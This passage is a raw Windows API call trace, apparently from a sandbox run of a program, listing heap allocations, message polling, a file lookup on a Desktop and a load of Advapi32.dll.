wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0189.196] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0189.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0189.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0189.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0189.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0189.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0189.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0189.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0189.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0189.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0189.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0189.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0189.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0189.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0189.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0189.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0189.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0189.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0189.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0189.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0189.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0189.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0189.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0189.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0189.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0189.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0189.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0189.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0189.197] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0189.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0189.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0189.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0189.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0189.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0189.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0189.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0189.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0189.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0189.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0189.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0189.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0189.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0189.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0189.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0189.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0189.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0189.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0189.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0189.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0189.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0189.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0189.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0189.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0189.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0189.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0189.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0189.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0189.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0189.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0189.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0189.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0189.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0189.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0189.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0189.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0189.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0189.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0189.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0189.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0189.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0189.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0189.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0189.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0189.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0189.200] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0189.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0189.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0189.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0189.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0189.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0189.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0189.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0189.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0189.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0189.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0189.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0189.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0189.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0189.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0189.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0189.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0189.201] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0189.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0189.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0189.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0189.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0189.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0189.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0189.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0189.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0189.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0189.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0189.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0189.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0189.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0189.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0189.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0189.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0189.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0189.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0189.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0189.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0189.202] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/srS5tTxQY.mp3", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea6bb1b0, ftCreationTime.dwHighDateTime=0x1d4d0c8, ftLastAccessTime.dwLowDateTime=0xc696cb50, ftLastAccessTime.dwHighDateTime=0x1d4cc9d, ftLastWriteTime.dwLowDateTime=0xc696cb50, ftLastWriteTime.dwHighDateTime=0x1d4cc9d, nFileSizeHigh=0x0, nFileSizeLow=0x9f34, dwReserved0=0x9d70006, dwReserved1=0xfa43, cFileName="srS5tTxQY.mp3", cAlternateFileName="SRS5TT~1.MP3")) returned 0xaa5860 [0189.202] FindClose (in: hFindFile=0xaa5860 | out: hFindFile=0xaa5860) returned 1 [0189.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0189.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0189.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0189.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0189.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0189.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0189.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0189.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0189.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0189.202] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0189.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0189.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0189.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0189.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0189.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0189.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0189.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0189.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0189.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0189.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0189.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0189.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0189.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0189.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0189.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0189.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0189.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0189.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0189.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0189.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0189.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0189.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0189.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0189.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0189.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0189.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0189.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0189.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0189.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0189.204] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0189.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0189.204] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0189.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0189.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0189.204] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0189.205] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0189.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0189.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0189.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0189.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0189.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0189.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0189.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0189.205] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0189.205] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.205] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0189.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0189.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0189.205] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0189.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0189.205] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0189.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0189.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0189.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0189.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0189.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0189.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0189.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0189.206] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0189.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0189.206] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0189.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0189.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0189.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0189.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0189.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0189.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0189.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0189.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0189.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0189.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0189.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0189.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0189.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0189.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0189.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0189.207] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0189.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0189.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0189.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.207] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0189.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0189.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0189.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0189.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0189.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0189.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0189.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0189.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0189.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0189.208] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 